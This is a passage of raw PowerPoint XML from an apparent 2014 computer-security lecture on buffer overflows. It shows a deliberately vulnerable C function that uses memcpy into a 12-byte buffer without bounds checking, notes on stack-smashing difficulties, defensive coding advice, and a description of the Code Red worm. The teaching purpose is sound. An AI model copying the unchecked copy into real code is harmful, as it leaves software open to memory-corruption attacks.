                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>char</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> c[12];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>memcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>(c, bar, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>strlen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>(bar));</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>	// no bounds checking... </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> main (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>argc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>char</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> **</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>	foo(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>[1]);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>} </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Date Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>28 Jan 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C552CEC0-AED0-2F49-9640-AB52F23ECF62}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>84</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 7" descr="Stack_Overflow_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657600" y="1219200"/>
            <a:ext cx="4381500"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9718878"/>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4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Marco Canini, © 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="366594" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Difficulties</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="366595" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>It is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>hard to guess</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> the growth of the stack and choose </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>the a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ddress</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The injected </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>machine code may </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>not have a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>\0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> byte, because this signals the end of a character string </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>and prevents copying the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>remaining </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>bytes</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Date Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>28 Jan 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C552CEC0-AED0-2F49-9640-AB52F23ECF62}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>85</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="232982196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Defeating Buffer Overflows</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Java/C# are not vulnerable to these attacks and memory is garbage collected</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>C </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>and C++ programming languages don’t do array bounds checks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>If you must use C/C++</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Avoid broken library routines (e.g., </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>strncpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> instead of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Always do bound checks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Manage memory properly</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Learn modern C++11 features, e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>shared_ptr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>unique_ptr</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Date Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>28 Jan 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Marco Canini, © 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C552CEC0-AED0-2F49-9640-AB52F23ECF62}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>86</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2944042261"/>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Red Worm, July 2001</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Exploited buffer overflow vulnerability </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>in MS-IIS web server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Attacker host scans for TCP port 80 and sends exploit string to the victim host</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The worm checks if the victim host was already compromised</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>If yes, it stops</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>If not, it begins to scan for random IP addresses to infect more serves</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In less than 14 hours, 359,104 hosts were </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>compromised</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>More: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://www.caida.org/analysis/security/code-red</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Date Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>28 Jan 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Marco Canini, © 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C552CEC0-AED0-2F49-9640-AB52F23ECF62}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>87</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5856667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Red’s exploit</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Content Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Additionally, web pages on victim machines may be defaced with the following message: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>HELLO</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>! Welcome to http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>www.worm.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>!</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Hacked </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>By Chinese! </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Date Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>28 Jan 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Marco Canini, © 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C552CEC0-AED0-2F49-9640-AB52F23ECF62}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>88</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="1524000"/>
            <a:ext cx="7620000" cy="2862322"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
